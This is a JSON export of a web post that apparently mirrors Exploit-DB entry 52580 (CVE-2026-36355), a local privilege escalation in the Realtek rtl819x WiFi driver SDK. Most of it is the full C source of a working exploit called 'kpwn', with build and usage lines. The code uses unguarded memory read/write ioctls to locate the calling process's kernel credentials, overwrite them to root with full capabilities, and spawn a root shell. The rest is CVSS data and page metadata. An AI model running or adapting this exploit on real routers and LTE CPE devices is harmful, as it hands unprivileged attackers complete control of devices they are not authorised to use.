{"id":57398,"date":"2026-05-27T08:49:54","date_gmt":"2026-05-27T08:49:54","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=57398"},"modified":"2026-05-27T08:49:54","modified_gmt":"2026-05-27T08:49:54","slug":"realtek-rtl819x-local-privilege","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=57398","title":{"rendered":"Realtek rtl819x – Local Privilege_EDB-ID:52580"},"content":{"rendered":"

{“lastseen”:”2026-05-27T13:27:56″,”description”:”Exploit Title: Realtek rtl819x – Local Privilege Escalation Date: 2026-05-03 Exploit Author: Daniil Gordeev Vendor Homepage: http:\/\/www.realtek.com Software Link: https:\/\/github.com\/iptime-gpl\/userappsn104qi representative GPL release Version: Realtek…”,”published”:”2026-05-27T00:00:00″,”modified”:”2026-05-27T00:00:00″,”type”:”exploitdb”,”title”:”Realtek rtl819x – Local Privilege”,”source”:””,”references”:””,”id”:”EDB-ID:52580″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-36355″],”sourceData”:” * Exploit Title: Realtek rtl819x – Local Privilege Escalation \\r\\n * Date: 2026-05-03\\r\\n * Exploit Author: Daniil Gordeev\\r\\n * Vendor Homepage: http:\/\/www.realtek.com\\r\\n * Software Link: https:\/\/github.com\/iptime-gpl\/userapps_n104qi (representative GPL release)\\r\\n * Version: Realtek rtl819x Jungle SDK, all known versions through v3.4.14B\\r\\n * Tested on: Linux 3.18.48, ARMv7 Cortex-A7, Qualcomm MDM9607, rtl8192es.ko (MeiG FORGE_SLT711 \/ Ortel 4G LTE CPE)\\r\\n * CVE: CVE-2026-36355\\r\\n *\\r\\n * kpwn – RTL8192CD kernel LPE exploit\\r\\n *\\r\\n * Exploits missing capability checks on ioctl 0x89F5\/0x89F6 (write_mem\/read_mem)\\r\\n * in the Realtek rtl819x out-of-tree WiFi driver SDK.\\r\\n *\\r\\n * Runs as ANY unprivileged user \u2014 no root needed at any stage.\\r\\n * Auto-detects task_struct offsets from init_task.\\r\\n *\\r\\n * Affected: ALL devices using Realtek rtl819x out-of-tree driver SDK\\r\\n * Chips: RTL8192C\/D\/E, RTL8188E, RTL8812, RTL8881A, RTL8197F, etc.\\r\\n *\\r\\n * Build: arm-linux-gnueabi-gcc -static -O2 -o tools\/kpwn tools\/kpwn.c\\r\\n * Usage: \/tmp\/kpwn (any user, GID 3003\/inet on paranoid kernels)\\r\\n *\/\\r\\n\\r\\n#include \\u003cstdio.h\\u003e\\r\\n#include \\u003cstdlib.h\\u003e\\r\\n#include \\u003cstring.h\\u003e\\r\\n#include \\u003cunistd.h\\u003e\\r\\n#include \\u003cerrno.h\\u003e\\r\\n#include \\u003cdirent.h\\u003e\\r\\n#include \\u003csys\/ioctl.h\\u003e\\r\\n#include \\u003csys\/socket.h\\u003e\\r\\n#include \\u003clinux\/wireless.h\\u003e\\r\\n\\r\\n#define IOCTL_WRITE 0x89F5 \/* SIOCDEVPRIVATE+5: write_mem *\/\\r\\n#define IOCTL_READ 0x89F6 \/* SIOCDEVPRIVATE+6: read_mem *\/\\r\\n\\r\\n\/* kernel .data scan range for init_task (ARM, no KASLR) *\/\\r\\n#define DATA_SCAN_START 0xC0800000\\r\\n#define DATA_SCAN_END 0xC1000000\\r\\n\\r\\nstatic int sockfd = -1;\\r\\nstatic int nioctls = 0;\\r\\nstatic char ifname[IFNAMSIZ];\\r\\n\\r\\n\/* —- kernel R\/W primitives —- *\/\\r\\n\\r\\nstatic int kread(unsigned long addr, void *out, int ndw)\\r\\n{\\r\\n struct iwreq wrq;\\r\\n char buf[256];\\r\\n\\r\\n if (ndw \\u003e 32) ndw = 32;\\r\\n snprintf(buf, sizeof(buf), \\”dw,%lx,%x\\”, addr, ndw);\\r\\n\\r\\n memset(\\u0026wrq, 0, sizeof(wrq));\\r\\n strncpy(wrq.ifr_name, ifname, IFNAMSIZ);\\r\\n wrq.u.data.pointer = buf;\\r\\n wrq.u.data.length = strlen(buf) + 1;\\r\\n\\r\\n if (ioctl(sockfd, IOCTL_READ, \\u0026wrq) \\u003c 0)\\r\\n return -1;\\r\\n\\r\\n nioctls++;\\r\\n int n = wrq.u.data.length;\\r\\n if (n \\u003e 0 \\u0026\\u0026 out)\\r\\n memcpy(out, buf, n \\u003e 128 ? 128 : n);\\r\\n return n;\\r\\n}\\r\\n\\r\\nstatic unsigned int kread32(unsigned long addr)\\r\\n{\\r\\n unsigned int v = 0;\\r\\n kread(addr, \\u0026v, 1);\\r\\n return v;\\r\\n}\\r\\n\\r\\nstatic int kfill(unsigned long addr, int ndw, unsigned int val)\\r\\n{\\r\\n struct iwreq wrq;\\r\\n char buf[256];\\r\\n\\r\\n snprintf(buf, sizeof(buf), \\”dw,%lx,%x,%x\\”, addr, ndw, val);\\r\\n\\r\\n memset(\\u0026wrq, 0, sizeof(wrq));\\r\\n strncpy(wrq.ifr_name, ifname, IFNAMSIZ);\\r\\n wrq.u.data.pointer = buf;\\r\\n wrq.u.data.length = strlen(buf) + 1;\\r\\n\\r\\n if (ioctl(sockfd, IOCTL_WRITE, \\u0026wrq) \\u003c 0)\\r\\n return -1;\\r\\n\\r\\n nioctls++;\\r\\n return 0;\\r\\n}\\r\\n\\r\\n\/* —- find vulnerable interface —- *\/\\r\\n\\r\\nstatic int find_interface(void)\\r\\n{\\r\\n DIR *d = opendir(\\”\/sys\/class\/net\\”);\\r\\n if (!d) return -1;\\r\\n\\r\\n struct dirent *e;\\r\\n unsigned int probe;\\r\\n while ((e = readdir(d))) {\\r\\n if (e-\\u003ed_name[0] == ‘.’ || strcmp(e-\\u003ed_name, \\”lo\\”) == 0)\\r\\n continue;\\r\\n strncpy(ifname, e-\\u003ed_name, IFNAMSIZ – 1);\\r\\n probe = 0;\\r\\n if (kread(0xC0008000, \\u0026probe, 1) \\u003e 0 \\u0026\\u0026 probe != 0) {\\r\\n closedir(d);\\r\\n return 0;\\r\\n }\\r\\n }\\r\\n closedir(d);\\r\\n return -1;\\r\\n}\\r\\n\\r\\n\/* —- resolve init_task —- *\/\\r\\n\\r\\nstatic unsigned long scan_for_init_task(void)\\r\\n{\\r\\n \/*\\r\\n * Brute-force: scan kernel .data for init_task.comm = \\”swapper\\”.\\r\\n * Validate by checking cred pointer (must dereference to uid=0, gid=0).\\r\\n *\\r\\n * The returned base doesn’t need to be exact \u2014 detect_offsets finds\\r\\n * all field positions relative to the base, and the math in find_task\\r\\n * and the overwrite phase uses (base + offset) pairs where any constant\\r\\n * shift cancels out. We just need \\”swapper\\” to land within the\\r\\n * detect_offsets search window (0x200-0x5F0 from returned base).\\r\\n *\/\\r\\n unsigned char buf[128];\\r\\n unsigned long addr;\\r\\n\\r\\n printf(\\”[*] Scanning .data for init_task…\\\\n\\”);\\r\\n\\r\\n for (addr = DATA_SCAN_START; addr \\u003c DATA_SCAN_END; addr += 128) {\\r\\n if (kread(addr, buf, 32) \\u003c= 0)\\r\\n continue;\\r\\n\\r\\n int j;\\r\\n for (j = 0; j \\u003c= 128 – 7; j += 4) {\\r\\n if (memcmp(buf + j, \\”swapper\\”, 7) != 0)\\r\\n continue;\\r\\n\\r\\n unsigned long comm_addr = addr + j;\\r\\n\\r\\n \/* validate: cred pointer just before comm \u2192 {usage, uid=0, gid=0} *\/\\r\\n unsigned int cred_ptr;\\r\\n if (kread(comm_addr – 4, \\u0026cred_ptr, 1) \\u003c= 0)\\r\\n continue;\\r\\n if ((cred_ptr \\u0026 0xC0000000) != 0xC0000000 || cred_ptr == 0xFFFFFFFF)\\r\\n continue;\\r\\n\\r\\n unsigned int chk[3];\\r\\n if (kread(cred_ptr, chk, 3) \\u003c= 0)\\r\\n continue;\\r\\n if (chk[0] \\u003c 1 || chk[0] \\u003e= 10000) \/* usage refcount *\/\\r\\n continue;\\r\\n if (chk[1] != 0 || chk[2] != 0) \/* uid=0, gid=0 *\/\\r\\n continue;\\r\\n\\r\\n \/*\\r\\n * Return comm_addr – 0x400 as base. This places comm at\\r\\n * offset 0x400 in the detect_offsets window (well within\\r\\n * the 0x200-0x5F0 search range). The base doesn’t need\\r\\n * to be the true struct start \u2014 all offset math cancels.\\r\\n *\/\\r\\n unsigned long base = comm_addr – 0x400;\\r\\n printf(\\”[+] scan: comm @ 0x%08lx, base 0x%08lx\\\\n\\”, comm_addr, base);\\r\\n return base;\\r\\n }\\r\\n }\\r\\n return 0;\\r\\n}\\r\\n\\r\\nstatic unsigned long resolve_init_task(void)\\r\\n{\\r\\n return scan_for_init_task();\\r\\n}\\r\\n\\r\\n\/* —- auto-detect task_struct layout —- *\/\\r\\n\\r\\nstruct offsets { unsigned long tasks, pid, cred, comm; };\\r\\n\\r\\nstatic int detect_offsets(unsigned long init, struct offsets *o)\\r\\n{\\r\\n unsigned char data[0x600];\\r\\n int i;\\r\\n\\r\\n \/* bulk-read init_task (12 reads, 128 bytes each) *\/\\r\\n for (i = 0; i \\u003c 0x600; i += 128)\\r\\n if (kread(init + i, data + i, 32) \\u003c= 0) {\\r\\n printf(\\”[-] Read init_task+0x%x failed\\\\n\\”, i);\\r\\n return -1;\\r\\n }\\r\\n\\r\\n \/* comm: find \\”swapper\\” string \u2014 unique, most reliable anchor *\/\\r\\n o-\\u003ecomm = 0;\\r\\n for (i = 0x200; i \\u003c 0x5F0; i += 4)\\r\\n if (memcmp(data + i, \\”swapper\\”, 7) == 0) { o-\\u003ecomm = i; break; }\\r\\n if (!o-\\u003ecomm) {\\r\\n printf(\\”[-] ‘swapper’ not found in init_task\\\\n\\”);\\r\\n return -1;\\r\\n }\\r\\n\\r\\n \/* cred: kernel pointer just before comm \u2192 dereferences to {usage, uid=0, gid=0} *\/\\r\\n o-\\u003ecred = 0;\\r\\n for (i = o-\\u003ecomm – 4; i \\u003e= (int)o-\\u003ecomm – 16; i -= 4) {\\r\\n unsigned int val = *(unsigned int *)(data + i);\\r\\n if ((val \\u0026 0xC0000000) == 0xC0000000 \\u0026\\u0026 val != 0xFFFFFFFF) {\\r\\n unsigned int chk[3];\\r\\n if (kread(val, chk, 3) \\u003e 0 \\u0026\\u0026\\r\\n chk[0] \\u003e= 1 \\u0026\\u0026 chk[0] \\u003c 10000 \\u0026\\u0026\\r\\n chk[1] == 0 \\u0026\\u0026 chk[2] == 0) {\\r\\n o-\\u003ecred = i;\\r\\n break;\\r\\n }\\r\\n }\\r\\n }\\r\\n if (!o-\\u003ecred) {\\r\\n printf(\\”[-] Cred pointer not found near comm\\\\n\\”);\\r\\n return -1;\\r\\n }\\r\\n\\r\\n \/* tasks: non-self-referencing list_head with valid chain and printable comm at next *\/\\r\\n o-\\u003etasks = 0;\\r\\n for (i = 0x100; i \\u003c 0x300; i += 4) {\\r\\n unsigned int next = *(unsigned int *)(data + i);\\r\\n unsigned int prev = *(unsigned int *)(data + i + 4);\\r\\n if ((next \\u0026 0xC0000000) != 0xC0000000 || next == 0xFFFFFFFF) continue;\\r\\n if ((prev \\u0026 0xC0000000) != 0xC0000000 || prev == 0xFFFFFFFF) continue;\\r\\n if (next == (unsigned int)(init + i)) continue;\\r\\n\\r\\n unsigned int nn = kread32(next);\\r\\n if ((nn \\u0026 0xC0000000) != 0xC0000000) continue;\\r\\n\\r\\n unsigned long next_base = (unsigned long)next – i;\\r\\n char tc[8] = {0};\\r\\n if (kread(next_base + o-\\u003ecomm, tc, 2) \\u003e 0 \\u0026\\u0026\\r\\n tc[0] \\u003e= 0x20 \\u0026\\u0026 tc[0] \\u003c 0x7F) {\\r\\n o-\\u003etasks = i;\\r\\n break;\\r\\n }\\r\\n }\\r\\n if (!o-\\u003etasks) {\\r\\n printf(\\”[-] Tasks list_head not found\\\\n\\”);\\r\\n return -1;\\r\\n }\\r\\n\\r\\n \/* pid: 0 in init_task, cross-verified against two other tasks (different PIDs) *\/\\r\\n o-\\u003epid = 0;\\r\\n unsigned int tasks_next = *(unsigned int *)(data + o-\\u003etasks);\\r\\n unsigned long first_base = (unsigned long)tasks_next – o-\\u003etasks;\\r\\n unsigned int second_ptr = kread32(tasks_next);\\r\\n unsigned long second_base = (unsigned long)second_ptr – o-\\u003etasks;\\r\\n\\r\\n for (i = o-\\u003etasks + 0x20; i \\u003c (int)o-\\u003ecomm – 0x20; i += 4) {\\r\\n if (*(unsigned int *)(data + i) != 0) continue;\\r\\n if (*(unsigned int *)(data + i + 4) != 0) continue; \/* pid=0 AND tgid=0 *\/\\r\\n unsigned int p1 = kread32(first_base + i);\\r\\n if (p1 == 0 || p1 \\u003e= 32768) continue;\\r\\n unsigned int p2 = kread32(second_base + i);\\r\\n if (p2 == 0 || p2 \\u003e= 32768) continue;\\r\\n if (p1 == p2) continue;\\r\\n o-\\u003epid = i;\\r\\n break;\\r\\n }\\r\\n if (!o-\\u003epid) {\\r\\n printf(\\”[-] PID offset not found\\\\n\\”);\\r\\n return -1;\\r\\n }\\r\\n\\r\\n return 0;\\r\\n}\\r\\n\\r\\n\/* —- walk task list backward (newest first, 1 ioctl per task) —- *\/\\r\\n\\r\\nstatic unsigned long find_task(unsigned long init, struct offsets *o,\\r\\n pid_t pid, int *walked)\\r\\n{\\r\\n unsigned long head = init + o-\\u003etasks;\\r\\n unsigned int buf[32];\\r\\n unsigned long cur;\\r\\n int batch = 0;\\r\\n int span = 0;\\r\\n *walked = 0;\\r\\n\\r\\n \/* if pid and tasks fit in one 32-dword read, batch them *\/\\r\\n if (o-\\u003epid \\u003e o-\\u003etasks) {\\r\\n span = (o-\\u003epid – o-\\u003etasks) \/ 4 + 1;\\r\\n if (span \\u003c= 32) batch = 1;\\r\\n }\\r\\n\\r\\n \/* walk backward: tasks.prev (offset +4) points to newest task *\/\\r\\n cur = kread32(head + 4);\\r\\n\\r\\n for (int i = 0; i \\u003c 512; i++) {\\r\\n if (cur == head || cur == 0)\\r\\n break;\\r\\n\\r\\n unsigned long base = cur – o-\\u003etasks;\\r\\n unsigned int p;\\r\\n unsigned long prev;\\r\\n\\r\\n if (batch) {\\r\\n \/* single read gets tasks.next, tasks.prev, and pid *\/\\r\\n if (kread(cur, buf, span) \\u003c= 0) break;\\r\\n prev = buf[1]; \/* tasks.prev = next older task *\/\\r\\n p = buf[(o-\\u003epid – o-\\u003etasks) \/ 4];\\r\\n } else {\\r\\n \/* fallback: two individual reads *\/\\r\\n p = kread32(base + o-\\u003epid);\\r\\n prev = kread32(cur + 4);\\r\\n }\\r\\n\\r\\n (*walked)++;\\r\\n if (p == (unsigned int)pid)\\r\\n return base;\\r\\n cur = prev;\\r\\n }\\r\\n return 0;\\r\\n}\\r\\n\\r\\n\/* —- main —- *\/\\r\\n\\r\\nint main(void)\\r\\n{\\r\\n uid_t orig_uid = getuid();\\r\\n gid_t orig_gid = getgid();\\r\\n pid_t pid = getpid();\\r\\n\\r\\n printf(\\”kpwn \\\\xe2\\\\x80\\\\x94 RTL8192CD kernel LPE\\\\n\\”);\\r\\n printf(\\”uid=%u gid=%u pid=%d\\\\n\\\\n\\”, orig_uid, orig_gid, pid);\\r\\n\\r\\n \/* socket *\/\\r\\n printf(\\”[*] Creating socket…\\\\n\\”);\\r\\n sockfd = socket(AF_INET, SOCK_DGRAM, 0);\\r\\n if (sockfd \\u003c 0) {\\r\\n printf(\\”[-] socket: %s\\\\n\\”, strerror(errno));\\r\\n if (errno == EACCES)\\r\\n printf(\\”[-] Need GID 3003 (inet) on paranoid kernels\\\\n\\”);\\r\\n return 1;\\r\\n }\\r\\n\\r\\n \/* find vulnerable interface *\/\\r\\n printf(\\”[*] Scanning interfaces…\\\\n\\”);\\r\\n if (find_interface() \\u003c 0) {\\r\\n printf(\\”[-] No rtl819x interface found\\\\n\\”);\\r\\n return 1;\\r\\n }\\r\\n printf(\\”[+] %s \u2014 read primitive confirmed\\\\n\\”, ifname);\\r\\n\\r\\n \/* resolve init_task *\/\\r\\n printf(\\”[*] Resolving init_task…\\\\n\\”);\\r\\n unsigned long init = resolve_init_task();\\r\\n if (!init) {\\r\\n printf(\\”[-] init_task not found\\\\n\\”);\\r\\n return 1;\\r\\n }\\r\\n printf(\\”[+] init_task @ 0x%08lx\\\\n\\”, init);\\r\\n\\r\\n \/* auto-detect offsets *\/\\r\\n printf(\\”[*] Detecting task_struct layout…\\\\n\\”);\\r\\n struct offsets o;\\r\\n if (detect_offsets(init, \\u0026o) \\u003c 0)\\r\\n return 1;\\r\\n printf(\\”[+] comm=0x%03lx cred=0x%03lx tasks=0x%03lx pid=0x%03lx\\\\n\\”,\\r\\n o.comm, o.cred, o.tasks, o.pid);\\r\\n\\r\\n \/* find our task_struct *\/\\r\\n printf(\\”[*] Searching for pid %d…\\\\n\\”, pid);\\r\\n int walked = 0;\\r\\n unsigned long task = find_task(init, \\u0026o, pid, \\u0026walked);\\r\\n if (!task) {\\r\\n printf(\\”[-] pid %d not found (%d tasks walked)\\\\n\\”, pid, walked);\\r\\n return 1;\\r\\n }\\r\\n\\r\\n \/* read and verify cred (batched: cred+comm in one read, uid+gid in one read) *\/\\r\\n unsigned int info[5];\\r\\n char *comm;\\r\\n unsigned long cred;\\r\\n unsigned int k_uid, k_gid;\\r\\n\\r\\n kread(task + o.cred, info, 5); \/* cred ptr + 16 bytes of comm *\/\\r\\n cred = info[0];\\r\\n comm = (char *)\\u0026info[1];\\r\\n\\r\\n unsigned int uids[2];\\r\\n kread(cred + 0x04, uids, 2); \/* uid + gid *\/\\r\\n k_uid = uids[0];\\r\\n k_gid = uids[1];\\r\\n\\r\\n printf(\\”[+] task=0x%08lx comm=\\\\\\”%s\\\\\\” (%d walked)\\\\n\\”, task, comm, walked);\\r\\n printf(\\”[+] cred=0x%08lx uid=%u gid=%u\\\\n\\”, cred, k_uid, k_gid);\\r\\n\\r\\n if (k_uid != orig_uid) {\\r\\n printf(\\”[-] uid mismatch: kernel=%u userspace=%u\\\\n\\”, k_uid, orig_uid);\\r\\n return 1;\\r\\n }\\r\\n\\r\\n \/* overwrite cred -\\u003e root (2 ioctls: zero uids + fill all caps) *\/\\r\\n printf(\\”[*] Overwriting credentials…\\\\n\\”);\\r\\n kfill(cred + 0x04, 9, 0); \/* uid..fsgid + securebits = 0 *\/\\r\\n kfill(cred + 0x28, 8, 0xFFFFFFFF); \/* cap_{inheritable,permitted,effective,bset} = full *\/\\r\\n\\r\\n if (getuid() != 0) {\\r\\n printf(\\”[-] FAILED \\\\xe2\\\\x80\\\\x94 uid still %d after overwrite\\\\n\\”, getuid());\\r\\n return 1;\\r\\n }\\r\\n\\r\\n printf(\\”[+] uid=%d euid=%d gid=%d egid=%d\\\\n\\\\n\\”,\\r\\n getuid(), geteuid(), getgid(), getegid());\\r\\n printf(\\”*** GOT ROOT *** uid=%u -\\u003e %d (%d ioctls)\\\\n\\\\n\\”, orig_uid, getuid(), nioctls);\\r\\n\\r\\n execl(\\”\/bin\/sh\\”, \\”sh\\”, NULL);\\r\\n printf(\\”[-] execl: %s\\\\n\\”, strerror(errno));\\r\\n return 1;\\r\\n}”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52580″,”cvss”:{“score”:7.7,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:L\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52580″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-05-27T13:27:56″,”description”:”Exploit Title: Realtek rtl819x – Local Privilege Escalation Date: 2026-05-03 Exploit Author: Daniil Gordeev Vendor Homepage: http:\/\/www.realtek.com Software Link: https:\/\/github.com\/iptime-gpl\/userappsn104qi representative GPL release Version: Realtek…”,”published”:”2026-05-27T00:00:00″,”modified”:”2026-05-27T00:00:00″,”type”:”exploitdb”,”title”:”Realtek…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,87,12,40,15,13,7,11,5],"class_list":["post-57398","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-77","tag-exploit","tag-exploitdb","tag-high","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\nRealtek rtl819x - Local Privilege_EDB-ID:52580 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=57398\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Realtek rtl819x - Local Privilege_EDB-ID:52580 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-05-27T13:27:56″,”description”:”Exploit Title: Realtek rtl819x – Local Privilege Escalation Date: 2026-05-03 Exploit Author: Daniil Gordeev Vendor Homepage: http:\/\/www.realtek.com Software Link: https:\/\/github.com\/iptime-gpl\/userappsn104qi representative GPL release Version: Realtek…”,”published”:”2026-05-27T00:00:00″,”modified”:”2026-05-27T00:00:00″,”type”:”exploitdb”,”title”:”Realtek...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=57398\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-27T08:49:54+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"14 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=57398#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=57398\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Realtek rtl819x – Local Privilege_EDB-ID:52580\",\"datePublished\":\"2026-05-27T08:49:54+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=57398\"},\"wordCount\":2816,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.7\",\"exploit\",\"exploitdb\",\"HIGH\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=57398#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=57398\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=57398\",\"name\":\"Realtek rtl819x - Local Privilege_EDB-ID:52580 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-05-27T08:49:54+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=57398#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=57398\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=57398#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Realtek rtl819x – Local Privilege_EDB-ID:52580\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Realtek rtl819x - Local Privilege_EDB-ID:52580 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=57398","og_locale":"en_US","og_type":"article","og_title":"Realtek rtl819x - Local Privilege_EDB-ID:52580 - zero redgem","og_description":"{“lastseen”:”2026-05-27T13:27:56″,”description”:”Exploit Title: Realtek rtl819x – Local Privilege Escalation Date: 2026-05-03 Exploit Author: Daniil Gordeev Vendor Homepage: http:\/\/www.realtek.com Software Link: https:\/\/github.com\/iptime-gpl\/userappsn104qi representative GPL release Version: Realtek…”,”published”:”2026-05-27T00:00:00″,”modified”:”2026-05-27T00:00:00″,”type”:”exploitdb”,”title”:”Realtek...","og_url":"https:\/\/zero.redgem.net\/?p=57398","og_site_name":"zero redgem","article_published_time":"2026-05-27T08:49:54+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"14 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=57398#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=57398"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Realtek rtl819x – Local Privilege_EDB-ID:52580","datePublished":"2026-05-27T08:49:54+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=57398"},"wordCount":2816,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.7","exploit","exploitdb","HIGH","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=57398#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=57398","url":"https:\/\/zero.redgem.net\/?p=57398","name":"Realtek rtl819x - Local Privilege_EDB-ID:52580 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-05-27T08:49:54+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=57398#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=57398"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=57398#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Realtek rtl819x – Local 